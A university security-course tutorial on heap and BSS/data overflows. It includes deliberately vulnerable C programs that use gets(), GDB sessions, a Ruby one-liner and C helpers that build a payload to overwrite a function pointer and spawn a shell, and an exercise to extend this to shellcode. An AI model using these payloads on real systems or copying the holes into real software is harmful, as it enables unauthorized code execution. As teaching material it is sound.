Heap Overflows

Introduction

Heap overflows are a type of buffer overflow and are very similar to stack-based buffer overflows. The main difference is that it is not as straightforward to execute custom code. Because you're overwriting data in the heap rather than on the stack, you can't simply overwrite a function's return address to redirect execution to shellcode. There are a few other tactics that you can use, however.

Overwriting global data

The following program initializes variables that are stored in the heap.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main() {

  static char filename[] = "/tmp/heap-overflow.txt";
  static char buffer[64] = "";

  gets(buffer);

  FILE *fd = fopen(filename, "w");
  if (fd != NULL) {
      fputs(buffer, fd);
      fclose(fd);
  }

  return 0;
}

This looks almost exactly like a stack-based buffer overflow, but there are a good number of differences. You cannot overwrite the return address of main like you could with a stack-based buffer overflow. As with data on the stack, though, the compiler may place things where you don't expect. Different compilers may put buffer above filename in memory, but GCC on Ubuntu 7.10 puts it below, allowing us to overwrite filename. The following demonstrates this:

wbyoung@netsec:~$ gcc -g vuln.c -o vuln
wbyoung@netsec:~$ gdb vuln
(gdb) b main
Breakpoint 1 at 0x8048435: file test.c, line 9.
(gdb) run
Starting program: /home/wbyoung/heap/a.out 

Breakpoint 1, main () at test.c:9
9     gets(buffer);
(gdb) n
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
11    FILE *fd = fopen(filename, "w");
(gdb) p filename
$1 = 'a' <repeats 15 times>, "\000ow.txt"
(gdb)

For programs that have special access, you can exploit these types of vulnerabilities to gain access to privileged files (like /etc/passwd and /etc/shadow).

To demonstrate some things to look for, let's make a small change to the program that we wrote initially. Simply remove the initialization of buffer.

static char buffer[64];

This small change will greatly affect the result. If you run through the same GDB instructions above, you'll see that printing filename now prints the original value, /tmp/heap-overflow.txt. What happens, then, if you change the order in which the two variables are declared?

static char buffer[64];
static char filename[] = "/tmp/heap-overflow.txt";

Recompiling and running through GDB will lead to the same result: filename remains unchanged. This is because the uninitialized buffer is actually stored in the .bss section of the compiled binary while filename is stored in the .data section, so the two are no longer adjacent. These nuances are important to recognize when looking for heap overflow vulnerabilities.
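
If you'd rather not step through GDB for every variation, you can have a program report where its own variables ended up. The following is a minimal sketch, not part of the original program: the names demo_filename, demo_buffer, demo_uninit, bytes_between and print_layout are made up for this illustration, and the addresses and distances it prints depend entirely on your compiler and linker.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical stand-ins for the tutorial's variables. */
static char demo_filename[] = "/tmp/heap-overflow.txt"; /* initialized   */
static char demo_buffer[64] = "x";                      /* initialized   */
static char demo_uninit[64];                            /* uninitialized */

/* Signed distance in bytes from `from` to `to`. A positive result means
   `to` is at a higher address, so writing past the end of `from` moves
   toward it. */
ptrdiff_t bytes_between(const void *from, const void *to) {
  assert(from != NULL && to != NULL);
  return (ptrdiff_t)((intptr_t)to - (intptr_t)from);
}

/* Print each address and the distance from each buffer to filename. */
void print_layout(void) {
  printf("filename      %p\n", (void *)demo_filename);
  printf("init buffer   %p (filename is %td bytes away)\n",
         (void *)demo_buffer, bytes_between(demo_buffer, demo_filename));
  printf("uninit buffer %p (filename is %td bytes away)\n",
         (void *)demo_uninit, bytes_between(demo_uninit, demo_filename));
}
```

Call print_layout() from main and compare the two distances. A small positive distance suggests that an overflow of that buffer can reach filename; a negative or very large one suggests the variables live in different sections.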

Discuss what would happen if the following changes were made:

static char buffer[64];
static char filename[23];
strcpy(filename, "/tmp/heap-overflow.txt");

And what about:

static char filename[23];
static char buffer[64];
strcpy(filename, "/tmp/heap-overflow.txt");

After discussing what you think should happen with each of these changes, run them through GDB and see what happens.

Since these variables aren't actually stored in the program's heap, these are not really heap overflows. They're BSS/Data overflows, which are often discussed in association with heap overflows.

Malloc

Overflow attacks against memory allocated with malloc and other memory management tools in the heap are also possible. Using the previous program, we can allocate data on the heap as follows:

char *filename = malloc(23);
char *buffer = malloc(64);
strcpy(filename, "/tmp/heap-overflow.txt");

If you run this through GDB, you'll find that you cannot overwrite filename. The initial setup declared filename first and that worked, so what's happening here? As you should remember, the heap grows upward, so space is allocated for filename first, and then buffer is allocated above that. In order for the overflow to work, buffer must be allocated first, so that it's below filename on the heap. Make this change and run it through GDB to verify that this is true.
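
You can also check the allocation order without GDB by printing the two addresses. This is a minimal sketch under the assumption that both requests are served from the same region of the heap; the function name second_minus_first is made up for this illustration, and the exact distance depends on your allocator.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Allocate two chunks in order and return (second - first) in bytes.
   A positive result means the second chunk is at the higher address,
   so writing past the end of the first chunk moves toward the second. */
ptrdiff_t second_minus_first(size_t first_size, size_t second_size) {
  char *first = malloc(first_size);
  char *second = malloc(second_size);
  assert(first != NULL && second != NULL);

  ptrdiff_t distance = (ptrdiff_t)((intptr_t)second - (intptr_t)first);
  printf("first    %p\nsecond   %p\ndistance %td bytes\n",
         (void *)first, (void *)second, distance);

  free(second);
  free(first);
  return distance;
}
```

Calling second_minus_first(64, 23) mirrors allocating buffer before filename, and second_minus_first(23, 64) mirrors the order shown above. The distance will usually be somewhat larger than the first size you requested, because allocators typically keep bookkeeping data and alignment padding between chunks.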

Overflows that rely on malloc and memory in the heap have additional restrictions. Imagine the following (contrived) situation:

srand(time(0));
char *buffer = malloc(64);
char *a = malloc(rand() % 46);
char *b = malloc(12);
free(a);
char *filename = malloc(23);
strcpy(filename, "/tmp/heap-overflow.txt");

In this case, the distance between filename and buffer is not deterministic. Though it may still be possible to overwrite filename every time, it's a lot more difficult to overwrite it with the exact value that you want. For the most part, memory allocation in a program is deterministic, and most (if not all) libc memory allocators are deterministic. When memory allocation depends on user input, however, the heap layout becomes unpredictable. A program that runs for a long period of time (such as a threaded server that accepts connections while listening on a socket) will for all intents and purposes be nondeterministic.
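
To get a feel for how much the layout can move, you can replay the allocation pattern above for every size that rand() % 46 can produce. The following is a minimal sketch; distance_for_hole and sweep_hole_sizes are hypothetical helper names, and whether the distance changes at all depends on how your allocator reuses freed chunks.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Repeat the allocation pattern from the text with a chosen size for `a`
   and return (filename - buffer) in bytes. */
ptrdiff_t distance_for_hole(size_t hole_size) {
  char *buffer = malloc(64);
  char *a = malloc(hole_size); /* may be NULL when hole_size is 0 */
  char *b = malloc(12);
  assert(buffer != NULL && b != NULL);

  free(a); /* leaves a hole whose size varies with hole_size */
  char *filename = malloc(23);
  assert(filename != NULL);

  ptrdiff_t distance = (ptrdiff_t)((intptr_t)filename - (intptr_t)buffer);

  free(filename);
  free(b);
  free(buffer);
  return distance;
}

/* Print the distance for every hole size from 0 through 45. */
void sweep_hole_sizes(void) {
  for (size_t size = 0; size < 46; size++) {
    printf("hole %2zu -> distance %td\n", size, distance_for_hole(size));
  }
}
```

If the printed distance takes more than one value, an attacker who cannot predict the hole size also cannot know how much filler to send before the replacement filename.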

Function pointers

One useful trick is being able to overwrite function pointers. Though many programmers don't use them often, they can be very useful when exploiting programs.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void shell() {
  execlp("sh", NULL);
}

void nothing() {}

int main() {
  static void (*func)() = nothing;
  static char buffer[64] = "";

  gets(buffer);

  func();

  return 0;
}

This program should read a line of text and then execute the function nothing. It is vulnerable to an overflow attack, and we can change the program to execute the function shell instead of nothing.

wbyoung@netsec:~$ gdb a.out
(gdb) b main
Breakpoint 1 at 0x80483d6: file test.c, line 15.
(gdb) run
Starting program: /home/wbyoung/heap/a.out 

Breakpoint 1, main () at test.c:15
15    gets(buffer);
(gdb) p shell
$1 = {void ()} 0x80483a4 <shell>
(gdb) p nothing
$2 = {void ()} 0x80483c0 <nothing>
(gdb) p func
$3 = (void (*)()) 0x80483c0 <nothing>
(gdb)

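As you can see, we want func to be changed to point to 0x80483a4, so let's use a few command line tools to set this up. Remember that the bytes of the address must be written in reverse order, least significant byte first, because the target machine is little-endian.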

ruby -e 'print "a"*64 + "\xa4\x83\x04\x08"*12' > input
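
The same input can be built in C, which makes the byte order explicit. This is a minimal sketch that mirrors the Ruby one-liner above (64 filler bytes followed by 12 copies of the address); put_le32, build_payload and the constant names are made up for this illustration, and the address is the one from this particular GDB session.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

enum {
  FILLER_LEN = 64,   /* size of buffer in the vulnerable program */
  ADDR_REPEATS = 12, /* same repeat count as the Ruby command    */
  PAYLOAD_LEN = FILLER_LEN + 4 * ADDR_REPEATS
};

/* Store a 32-bit address least significant byte first (little-endian). */
void put_le32(unsigned char out[4], uint32_t addr) {
  out[0] = (unsigned char)(addr & 0xff);
  out[1] = (unsigned char)((addr >> 8) & 0xff);
  out[2] = (unsigned char)((addr >> 16) & 0xff);
  out[3] = (unsigned char)((addr >> 24) & 0xff);
}

/* Fill `payload` with 64 'a' bytes followed by 12 copies of the address.
   Returns the number of bytes written. */
size_t build_payload(unsigned char *payload, size_t capacity, uint32_t addr) {
  assert(capacity >= (size_t)PAYLOAD_LEN);
  memset(payload, 'a', FILLER_LEN);
  for (size_t i = 0; i < ADDR_REPEATS; i++) {
    put_le32(payload + FILLER_LEN + 4 * i, addr);
  }
  return PAYLOAD_LEN;
}
```

Calling build_payload with 0x080483a4 and writing the result to a file with fwrite produces the same 112 bytes as the Ruby command. Repeating the address gives some slack in case func does not start immediately after buffer.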

Now run the program again, reading from the input file.

wbyoung@netsec:~$ gdb a.out
(gdb) b main
Breakpoint 1 at 0x80483d6: file test.c, line 15.
(gdb) run < input
Starting program: /home/wbyoung/heap/a.out < input

Breakpoint 1, main () at test.c:15
15    gets(buffer);
(gdb) n
17    func();
(gdb) p func
$1 = (void (*)()) 0x80483a4 <shell>
(gdb) s
shell () at test.c:6
6     execlp("sh", NULL);
(gdb)

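Note: Continuing from here will not leave you at an interactive shell. The program's standard input is still the input file, which has already been read to the end, so sh finds nothing to read and exits immediately.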

The function pointer has successfully been updated to point to a different function. Using this same technique, you can change the function pointer to point anywhere in memory. You can therefore use this technique to execute shellcode as well.
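
The mechanics of the overwrite can be reproduced safely inside a single struct, where the position of the function pointer relative to the buffer is known. The following is a minimal sketch rather than an exploit: struct victim, nothing_stub, shell_stub, overflow_into and run_demo are hypothetical names, and the copy is deliberately clamped so that it never writes outside the struct.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical victim: a buffer with a function pointer placed after it. */
struct victim {
  char buffer[64];
  int (*func)(void);
};

int nothing_stub(void) { return 0; } /* stands in for nothing() */
int shell_stub(void) { return 1; }   /* stands in for shell()   */

/* Copy attacker-controlled bytes over the start of the struct, the way an
   unbounded read into buffer would, but clamped to the struct's size. */
void overflow_into(struct victim *v, const unsigned char *input, size_t len) {
  if (len > sizeof *v) {
    len = sizeof *v;
  }
  memcpy(v, input, len);
}

/* Build an input that fills everything before func with 'a' and then
   supplies the bytes of a pointer to shell_stub. Returns the value of the
   call made through the overwritten pointer. */
int run_demo(void) {
  struct victim v;
  memset(&v, 0, sizeof v);
  v.func = nothing_stub;

  int (*target)(void) = shell_stub;
  unsigned char input[sizeof(struct victim)];
  size_t func_offset = offsetof(struct victim, func);
  memset(input, 'a', func_offset);
  memcpy(input + func_offset, &target, sizeof target);

  overflow_into(&v, input, func_offset + sizeof target);
  assert(v.func == shell_stub);
  return v.func(); /* now calls shell_stub instead of nothing_stub */
}
```

run_demo() returns 1, the value from shell_stub, even though func was set to nothing_stub. A real gets call has no clamp like the one in overflow_into, which is exactly what makes the original program exploitable.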

Uses in stack-based buffer overflows

This tutorial outlined strategies to use with heap overflows. It's worth noting, though, that all of the strategies outlined here can also be used with standard stack-based buffer overflows. It may be easier or more useful in some cases to use these strategies.

Advanced heap overflows

Heap overflows also include a class of exploits that are more complicated than those explained in this tutorial. Some of these exploits attack vulnerabilities in memory allocation functions such as malloc in libc. These vulnerabilities tend to be significantly more complicated and specific to certain versions of libraries, but if you have time, search for and read about them.

Classwork

Get the function pointer exploit to work outside of GDB. If you have time once you've completed that, get it to work with shellcode and no shell function.

Copyright 2008 the following:
Sam McIngvale sam.mcingvale@u.northwestern.edu
Jim Spadaro j-spadaro@northwestern.edu
Whitney Young wbyoung@u.northwestern.edu
All rights reserved. Permission to reproduce this document in whole or in part must be obtained from the authors.

Introduction to System Security

Northwestern CS, Winter Quarter 2023